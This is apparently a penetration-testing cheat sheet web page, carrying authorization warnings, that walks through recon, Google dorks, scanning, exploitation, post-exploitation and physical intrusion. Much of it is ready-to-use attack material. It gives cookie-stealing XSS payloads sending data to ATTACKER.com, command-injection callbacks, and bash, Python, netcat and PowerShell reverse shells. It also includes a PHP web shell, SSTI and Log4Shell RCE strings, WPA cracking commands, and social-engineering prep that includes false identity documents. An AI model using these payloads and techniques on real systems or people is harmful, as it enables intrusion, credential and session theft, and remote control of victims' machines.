// MISSION OVERVIEW
BRIEFING
⚠
All techniques below must only be used in the context of an authorized penetration test, bug bounty program, or lab environment. Always obtain written permission before testing.
Phase 01
RECONNAISSANCE
Passive and active information gathering about the target. Includes OSINT, DNS enumeration, network mapping, and infrastructure analysis.
MaltegoShodantheHarvesterRecon-ngOSINT Framework
Phase 02
SCANNING & ENUMERATION
Identify active services, software versions, potential vulnerabilities, and exploitable attack surfaces.
NmapMasscanNiktoGobusterNessus
Phase 03
GAINING ACCESS
Exploit vulnerabilities to gain initial access. Includes web application attacks, network exploitation, and social engineering.
MetasploitBurp SuiteSQLMapHydraBeEF
Phase 04
MAINTAINING ACCESS
Persistence on the target system, privilege escalation, lateral movement, and bypassing security mechanisms.
MimikatzBloodHoundCobalt StrikeEmpire
Phase 05
REPORTING & REMEDIATION
Document findings, analyze impact, provide mitigation recommendations, and present results to stakeholders.
DradisSerpicoCVSS Calculator
VERY LOW
LOW
HIGH
CRITICAL
RECON
✓
✓
~
✗
SCAN
✓
~
!
✗
EXPLOIT
~
!
!!
✗✗
POST-EX
!
!!
!!!
✗✗✗
// RECONNAISSANCE
PHASE 01
PASSIVE OSINT
OSINT
Information gathering techniques with no direct interaction with the target.
- Shodan.io — IoT device & open server search engine
- Censys.io — Internet-wide scan, TLS certificates & ports
- FOFA — Shodan alternative with richer fingerprinting
- Hunter.io — Employee email enumeration from domain
- LinkedIn OSINT — Org structure & employee roles
- Wayback Machine — Old site versions, hidden files
DNS ENUMERATION
RECON
DNS infrastructure mapping to discover subdomains and hidden records.
amass enum -d target.com— Subdomain brute + passivesubfinder -d target.com— Multi-source subdomain finderdnsx -l subdomains.txt -a— Mass DNS resolutiondig target.com ANY— All DNS recordsfierce --domain target.com— DNS recon & zone transferdnsrecon -d target.com -t axfr— Zone transfer attack
PORT & SERVICE SCAN
RECON
Identify open ports, active services, and software versions on the target.
nmap -sV -sC -O target.com— Full scan + OS detectionnmap -p- --min-rate 5000 target— All 65535 portsmasscan -p1-65535 target --rate=10000— Ultra fast scannmap --script vuln target— NSE vulnerability scriptsrustscan -a target -- -sV— Rust-based speed scan
WEB FINGERPRINTING
RECON
Identify technologies, frameworks, and CMS used by the target.
- WhatWeb — Technology & CMS plugin detection
- Wappalyzer — Browser ext. technology fingerprint
nikto -h target.com— Web server vulnerability scangobuster dir -u URL -w wordlist— Directory brute forceffuf -u URL/FUZZ -w list.txt— Fast web fuzzer
PEOPLE OSINT
OSINT
Gathering individual-level information for social engineering campaigns.
- Maltego — Visual link analysis & entity mapping
- theHarvester — Emails, subdomains, IPs from public sources
- Social Mapper — Cross-platform facial recognition
- GitHub OSINT — Exposed credentials & API keys in repos
METADATA EXTRACTION
OSINT
Extract metadata from public documents to uncover internal information.
exiftool document.pdf— Author, software, GPS data- FOCA — Metadata from web documents (PDF, Office)
- metagoofil — Documents from Google & metadata
- Social media photos — GPS, device, time from shared images
# Comprehensive Nmap scan
root@kali:~# nmap -sV -sC -O -A -p- --min-rate 1000 -oN scan.txt 192.168.1.0/24
Starting Nmap 7.94 ( https://nmap.org )
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1
80/tcp open http Apache httpd 2.4.41
443/tcp open ssl/https nginx 1.18.0
3306/tcp open mysql MySQL 8.0.28
admin.target.com [INTERESTING]
# Subdomain enumeration
root@kali:~# amass enum -passive -d target.com | tee subdomains.txt
api.target.com
dev.target.com
staging.target.com
admin.target.com [FOUND]
// GOOGLE DORKS
48 DORKS
ℹ
Google Dorks use advanced search operators to find sensitive information accidentally indexed. Use only for authorized bug bounty & security assessments.
| CATEGORY | DORK QUERY | PURPOSE |
|---|---|---|
| EXPOSED FILES | site:target.com filetype:sql | Exposed SQL database files |
| EXPOSED FILES | site:target.com filetype:env | .env file with credentials |
| EXPOSED FILES | site:target.com filetype:log | Application & server log files |
| EXPOSED FILES | site:target.com filetype:bak | Database & config backup files |
| EXPOSED FILES | site:target.com filetype:xml inurl:config | XML configuration files |
| EXPOSED FILES | site:target.com ext:php inurl:upload | PHP file upload forms |
| EXPOSED FILES | site:target.com "id_rsa" OR "id_dsa" | Exposed private SSH keys |
| EXPOSED FILES | site:target.com filetype:pem "PRIVATE KEY" | PEM certificate & private key |
| LOGIN PAGES | site:target.com inurl:admin | Website administration panels |
| LOGIN PAGES | site:target.com inurl:login OR inurl:signin | Application login pages |
| LOGIN PAGES | site:target.com intitle:"admin panel" | Admin pages by title |
| LOGIN PAGES | site:target.com inurl:wp-admin | WordPress admin panel |
| LOGIN PAGES | site:target.com inurl:phpmyadmin | phpMyAdmin database interface |
| CREDENTIALS | site:pastebin.com "target.com" password | Credential leaks on Pastebin |
| CREDENTIALS | site:github.com "target.com" "password" | Hardcoded credentials in GitHub |
| CREDENTIALS | site:github.com "target.com" "api_key" | Leaked API keys in repositories |
| CREDENTIALS | site:github.com "target.com" "secret_key" | Secret keys in source code |
| CREDENTIALS | site:trello.com "target.com" | Internal info in Trello cards |
| DIR LISTING | site:target.com intitle:"index of /" | Active directory listing |
| DIR LISTING | site:target.com intitle:"index of" "parent directory" | Open directory with files |
| DIR LISTING | site:target.com intitle:"index of" passwd | Directory containing passwd file |
| ERROR MSGS | site:target.com "SQL syntax" OR "mysql_fetch" | SQL Injection error exposure |
| ERROR MSGS | site:target.com "Warning: include()" | PHP include() error → LFI hint |
| ERROR MSGS | site:target.com intitle:"error" "stack trace" | Stack trace from application crash |
| ERROR MSGS | site:target.com "ORA-" OR "Oracle error" | Oracle database error |
| NETWORK DEVICES | intitle:"router" inurl:setup.cgi | Open router setup panel |
| NETWORK DEVICES | intitle:"AXIS" inurl:view/view.shtml | Open AXIS cameras |
| NETWORK DEVICES | inurl:/view.shtml "Live View" | Public CCTV & IP cameras |
| NETWORK DEVICES | intitle:"VNC desktop" inurl:5800 | VNC server open via web |
| NETWORK DEVICES | intitle:"SCADA" inurl:index.html | Exposed SCADA/ICS interface |
| TECH SPECIFIC | site:target.com inurl:".git/HEAD" | Exposed .git repository |
| TECH SPECIFIC | site:target.com inurl:".svn/entries" | Exposed SVN repository |
| TECH SPECIFIC | site:target.com "Powered by Jira" | Jira project management exposed |
| TECH SPECIFIC | site:target.com inurl:jenkins | Jenkins CI/CD dashboard |
| TECH SPECIFIC | site:target.com "swagger" OR "api-docs" | Exposed API documentation |
| CLOUD | site:s3.amazonaws.com "target" | Public S3 buckets belonging to target |
| CLOUD | site:blob.core.windows.net "target" | Public Azure Blob storage |
| CLOUD | site:storage.googleapis.com "target" | Public Google Cloud Storage |
| JUICY INFO | site:target.com filetype:xls "password" | Spreadsheets containing passwords |
| JUICY INFO | site:target.com "internal use only" | Internal confidential documents |
| JUICY INFO | site:target.com "confidential" filetype:pdf | Indexed confidential PDFs |
| JUICY INFO | site:target.com intext:"BEGIN RSA PRIVATE KEY" | RSA private key in page content |
| JUICY INFO | site:target.com intext:"Authorization: Bearer" | Exposed Bearer tokens |
| VULN HUNT | site:target.com inurl:"redirect" inurl:"url=" | Open redirect vulnerability |
| VULN HUNT | site:target.com inurl:"?file=" OR inurl:"?path=" | Local/Remote File Inclusion |
| VULN HUNT | site:target.com inurl:"search" "q=" | Search parameter → XSS test point |
// PAYLOADS
XSS · SQLi · RCE · LFI
⛔
The payloads below are only for testing on systems with official written authorization. Using them on unauthorized systems is a criminal offense.
▌ XSS PAYLOADS
BASIC XSS
// Basic script injection
<script>alert('XSS')</script>
<script>alert(document.cookie)</script>
// Image onerror bypass
<img src=x onerror=alert('xss')>
<img src=x onerror=alert(document.domain)>
// SVG vector
<svg onload=alert('xss')>
<svg/onload=alert(`${document.domain}`)>
FILTER BYPASS XSS
// Case variation bypass
<ScRiPt>alert('XSS')</sCrIpT>
// Event handler bypass
<body onload=alert('xss')>
<input onfocus=alert('xss') autofocus>
// JavaScript URI
<a href=javascript:alert('xss')>Click</a>
// HTML entity encoding
<img src=x onerror=alert(1)>
// Double URL encode
%253Cscript%253Ealert(1)%253C/script%253E
COOKIE STEALER XSS
// Send cookie to attacker server
<script>
new Image().src = 'http://ATTACKER.com/steal?c=' + document.cookie;
</script>
// Fetch API version
<script>
fetch('https://ATTACKER.com/steal?c=' + btoa(document.cookie));
</script>
// One-liner
<svg onload=fetch(`//ATTACKER.com?c=${btoa(document.cookie)}`)>
▌ SQL INJECTION PAYLOADS
DETECTION — ERROR-BASED
-- Basic detection probes
' '' ` `` , " "" / // \ \\ ;
-- Boolean-based
' OR '1'='1
' OR 1=1 --
1' ORDER BY 1--
1' ORDER BY 2--
1' ORDER BY 3-- -- Increase until error
-- UNION-based detection
1' UNION SELECT NULL--
1' UNION SELECT NULL,NULL--
1' UNION SELECT NULL,NULL,NULL--
SQLi — DATA EXTRACTION
-- MySQL: Extract database & tables
' UNION SELECT 1,database(),3--
' UNION SELECT 1,group_concat(table_name),3 FROM information_schema.tables WHERE table_schema=database()--
' UNION SELECT 1,group_concat(column_name),3 FROM information_schema.columns WHERE table_name='users'--
' UNION SELECT 1,group_concat(username,':',password),3 FROM users--
-- Time-based blind SQLi
'; IF (1=1) WAITFOR DELAY '0:0:5'--
' AND SLEEP(5)--
▌ COMMAND INJECTION & RCE
COMMAND INJECTION
# Command injection delimiters
; whoami | whoami || whoami & whoami && whoami
`whoami` $(whoami)
# Blind injection — DNS callback
; nslookup ATTACKER.com
; curl http://ATTACKER.com/`whoami`
; wget http://ATTACKER.com/?x=`id`
# Windows
& whoami & | net user ; ipconfig
▌ LFI / PATH TRAVERSAL
LOCAL FILE INCLUSION
# Basic path traversal
../etc/passwd
../../etc/passwd
../../../etc/passwd
....//....//etc/passwd
..%2F..%2Fetc%2Fpasswd
# Windows path traversal
..\windows\system32\drivers\etc\hosts
..%5C..%5Cwindows%5Csystem32
# Null byte bypass (PHP < 5.3)
../etc/passwd%00
../etc/passwd%00.jpg
# Interesting files
/etc/passwd /etc/shadow /etc/hosts
/proc/version /var/log/apache2/access.log
~/.ssh/id_rsa /var/www/html/config.php
▌ REVERSE SHELL PAYLOADS
REVERSE SHELLS
# Bash TCP reverse shell
bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1
# Python 3 reverse shell
python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("ATTACKER_IP",PORT));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'
# Netcat reverse shell
nc -e /bin/sh ATTACKER_IP PORT
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ATTACKER_IP PORT >/tmp/f
# PHP web shell
<?php system($_GET['cmd']); ?>
# PowerShell reverse shell
powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("ATTACKER_IP",PORT);
// NETWORK ATTACKS
MiTM · WIRELESS · PIVOTING
WIRELESS ATTACKS
EXPLOIT
Attacks against WiFi networks: WPA handshake capture, evil twin, deauthentication.
airmon-ng start wlan0— Enable monitor modeairodump-ng wlan0mon— Scan WiFi networksaireplay-ng --deauth 10 -a [BSSID] wlan0mon— Deauth attackaircrack-ng -w wordlist.txt capture.cap— WPA crack- Hostapd-WPE — WPA Enterprise credential capture
- WiFi-Pumpkin — Evil twin & phishing portal
MAN-IN-THE-MIDDLE
EXPLOIT
Intercept and modify traffic between victim and gateway.
arpspoof -i eth0 -t [VICTIM] [GATEWAY]— ARP spoofing- Bettercap — All-in-one MiTM framework
- Ettercap — Network sniffer & MiTM
- mitmproxy — HTTP/S traffic interception
- Responder — NBT-NS / LLMNR poisoning
PASSWORD ATTACKS
EXPLOIT
Brute force, dictionary attacks, and credential stuffing against services.
hydra -L users.txt -P pass.txt ssh://target— SSH brutehashcat -m 0 hash.txt wordlist.txt— MD5 crackhashcat -m 1000 ntlm.txt rockyou.txt— NTLM crackjohn --wordlist=rockyou.txt hash.txt— John the Ripper- CrackStation — Online hash database lookup
PIVOTING & TUNNELING
POST-EX
Lateral movement and tunneling through internal networks.
ssh -L 8080:internal:80 user@pivot— SSH local port forwardssh -D 1080 user@pivot— SOCKS proxy via SSH- Chisel — Fast TCP/UDP tunnel over HTTP
- Ligolo-ng — Layer 3 tunneling via reverse shell
- proxychains — Route tools through SOCKS proxy
# Enable monitor mode
root@kali:~# airmon-ng check kill && airmon-ng start wlan0
phy0 wlan0mon rtl8812au Realtek 802.11ac
# Scan for targets
root@kali:~# airodump-ng wlan0mon --band abg
BSSID PWR CH ENC ESSID
AA:BB:CC:DD:EE:FF -45 6 WPA2 TARGET_CORP
# Capture handshake via deauth
root@kali:~# aireplay-ng --deauth 10 -a AA:BB:CC:DD:EE:FF wlan0mon
WPA handshake: AA:BB:CC:DD:EE:FF [captured]
# Crack captured handshake
root@kali:~# hashcat -m 22000 capture.hc22000 /usr/share/wordlists/rockyou.txt
Speed.#1.........: 2847.8 MH/s
// WEB APP TESTING
OWASP TOP 10
AUTHENTICATION BYPASS
EXPLOIT
Authentication bypass techniques in web applications.
- Default credentials: admin:admin, admin:password, root:root
- JWT None algorithm: alg=none payload manipulation
- JWT weak secret brute: jwt_tool, hashcat mode 16500
- Password reset poisoning via Host header
- 2FA bypass: response manipulation, race condition
FILE UPLOAD BYPASS
PAYLOAD
Bypass file upload validation to achieve RCE via webshell.
- Double extension: shell.php.jpg, shell.php.png
- Null byte: shell.php%00.jpg (PHP < 5.3)
- MIME type spoofing: Content-Type: image/jpeg
- Magic bytes: Prepend GIF89a; before PHP code
- Alternate extensions: .phtml .phar .php5 .shtml
SSRF ATTACKS
EXPLOIT
Server-Side Request Forgery to access internal resources.
http://localhost/admin— Internal admin panelhttp://169.254.169.254/latest/meta-data/— AWS metadatahttp://metadata.google.internal/— GCP metadatafile:///etc/passwd— Local file read- Bypass: 127.1, 0x7f000001, 017700000001
INJECTION ATTACKS
PAYLOAD
Various injection types beyond SQLi and XSS.
- SSTI:
{{7*7}}${7*7}#{7*7} - LDAP:
*)(&*)(uid=* - XML/XXE: External entity declaration
- NoSQL:
{"$ne": null}{"$gt": ""} - CRLF:
%0d%0afor header injection - Log4Shell:
${jndi:ldap://attacker.com/x}
SERVER-SIDE TEMPLATE INJECTION (SSTI)
# Detection probes
{{7*7}} # Jinja2, Twig → 49
${7*7} # FreeMarker → 49
#{7*7} # Ruby ERB → 49
{{7*'7'}} # Jinja2 → 7777777, Twig → 49
# Jinja2 RCE payload
{{config.__class__.__init__.__globals__['os'].popen('id').read()}}
# Twig RCE payload
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
# FreeMarker RCE
<#assign ex="freemarker.template.utility.Execute"?new()>${ ex("id")}
// POST-EXPLOITATION
PERSISTENCE · PRIVESC · EXFIL
PRIVESC (LINUX)
POST-EX
Privilege escalation techniques from regular user to root on Linux.
sudo -l— Check passwordless sudo commandsfind / -perm -4000 2>/dev/null— SUID binaries- LinPEAS / LinEnum — Automated privesc checker
- GTFOBins — SUID/sudo binary exploitation
- Cron job abuse — Writable script executed by root
- Kernel exploit — Dirty COW, PwnKit, DirtyPipe
PRIVESC (WINDOWS)
POST-EX
Privilege escalation in Windows & Active Directory environments.
- WinPEAS — Automated Windows privesc enumeration
- BloodHound — AD attack path visualization
- Mimikatz — LSASS dump, pass-the-hash
- Token impersonation — Juicy Potato, PrintSpoofer
- AlwaysInstallElevated — MSI install escalation
PERSISTENCE
POST-EX
Persistence techniques after successful exploitation.
- Linux: crontab, ~/.bashrc, /etc/rc.local, systemd service
- SSH key injection into ~/.ssh/authorized_keys
- Windows: Registry Run keys, Scheduled Tasks
- Windows: WMI Event Subscription, DLL hijacking
- Web shell in webserver directory
DATA EXFILTRATION
POST-EX
Silently extract data bypassing DLP & monitoring systems.
- DNS exfiltration — Data encoded in DNS queries
- ICMP tunneling — Data in ICMP echo packets
- HTTPS to C2 — Encrypted traffic to C2 server
- Steganography — Data hidden in images/audio
- Cloud storage — Upload to Dropbox, Google Drive
LINUX PRIVESC — QUICK COMMANDS
# System enumeration
id; whoami; uname -a; cat /etc/os-release
cat /etc/passwd | grep -v nologin
ss -tlnp 2>/dev/null || netstat -tlnp
# SUID binaries
find / -perm -4000 -type f 2>/dev/null
# Writable directories
find / -writable -type d 2>/dev/null | grep -v proc
# Check sudo rights
sudo -l
# Cron jobs
crontab -l; ls -la /etc/cron*; cat /etc/crontab
# Download LinPEAS and run
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
// PHYSICAL SECURITY
SOCIAL ENG · LOCK · RFID
⚠
Physical penetration testing MUST be conducted with very explicit written authorization. Without permission, all actions below constitute serious criminal offenses.
SOCIAL ENGINEERING
PHYSICAL
Psychological manipulation to obtain access or information from target individuals.
- Pretexting — Build convincing false scenarios
- Phishing — Fake email/SMS with high urgency
- Vishing — Phone impersonation of IT support or vendor
- Baiting — USB drop with malware at target location
- Tailgating — Follow employee through access-controlled door
- Quid Pro Quo — Trade technical help for access
LOCK BYPASS
PHYSICAL
Physical lock bypass techniques to gain entry into restricted areas.
- Lock picking — Single pin picking (SPP), raking
- Bump key — Special key with impulse strike
- Bypass tools — Loiding card, shimming padlocks
- Under-door tool — Manipulate door lever from below
- Crash bar defeat — Bypass exit hardware from outside
RFID / ACCESS CARD
PHYSICAL
Cloning and bypassing RFID card access systems.
- Proxmark3 — Universal RFID tool (read, clone, emulate)
- Flipper Zero — Multi-tool: RFID, NFC, Sub-GHz
- ACR122U — NFC reader/writer for Mifare cards
- HID Prox cloning — EM4100 125kHz clone attack
- MiFare Classic — Default key attack (mfcuk, mfoc)
ROGUE HARDWARE
PHYSICAL
Malicious hardware devices implanted to gain persistent access.
- Raspberry Pi — Covert network implant
- LAN Turtle — Network implant in USB adapter
- WiFi Pineapple — Rogue AP & traffic interception
- Bash Bunny — Multi-payload USB attack platform
- O.MG Cable — Malicious charging cable with WiFi
SURVEILLANCE BYPASS
PHYSICAL
Operating under CCTV and surveillance systems.
- Camera blind spot mapping before operation
- CCTV system assessment — DVR brand default credentials
- Timing attack — Enter during guard blind spot
- Motion sensor bypass — Slow deliberate movement
DUMPSTER DIVING
OSINT
Gathering intelligence from material discarded by the target.
- Internal documents, memos, and discarded reports
- Old hardware — HDDs, USBs with residual data
- Post-it notes, lost access badges
- Forms with names, roles, internal numbers
- Printer output — Configs, password sheets
PRE-ENGAGEMENT CHECKLIST
Signed scope of work from both parties
Get-out-of-jail letter received from client
24/7 client emergency contact available
Physical boundaries clearly defined
Allowed & forbidden actions defined
Operation time window agreed upon
Authorization proof carried during operation
SOCIAL ENGINEERING PREP
Pretext story prepared & rehearsed
False identity documents prepared
Internal company knowledge studied
Key employee names known
Exit plan prepared if compromised
Covert recording device ready
Attire/appearance matches pretext
// PENTEST CHECKLIST
ENGAGEMENT TRACKER
📋 RECON PHASE
Passive DNS enumeration complete
Subdomain brute force complete
Shodan/Censys search complete
Google dork search complete
Email harvesting complete
GitHub/Pastebin leak check complete
WHOIS & registrar info collected
LinkedIn OSINT complete
🔍 SCANNING PHASE
Full port scan of all target IPs
Service version detection complete
OS fingerprinting complete
Web server scan (Nikto) complete
Directory brute force complete
Vulnerability scan (Nessus/OpenVAS)
CMS scan if applicable
💥 EXPLOITATION PHASE
SQL injection test complete
XSS test complete (reflected, stored, DOM)
Authentication bypass test complete
IDOR/Broken access control tested
File upload bypass test complete
SSRF test complete
Default credentials check complete
🎯 POST-EXPLOITATION
Local enumeration complete
Privilege escalation attempted
Credential harvesting complete
Lateral movement attempted
Persistence mechanism tested
Data exfiltration proof-of-concept
Evidence & screenshots collected
📝 REPORTING
Executive summary written
Findings documented with evidence
CVSS score calculated per finding
Remediation recommendations written
PoC steps are reproducible
Risk rating defined
Final report delivered to client
🧹 CLEANUP
Web shells removed from server
Backdoor users deleted
Added SSH keys removed
Scheduled tasks/cron removed
Uploaded tools removed
Access logs during pentest documented
Client confirmed system back to normal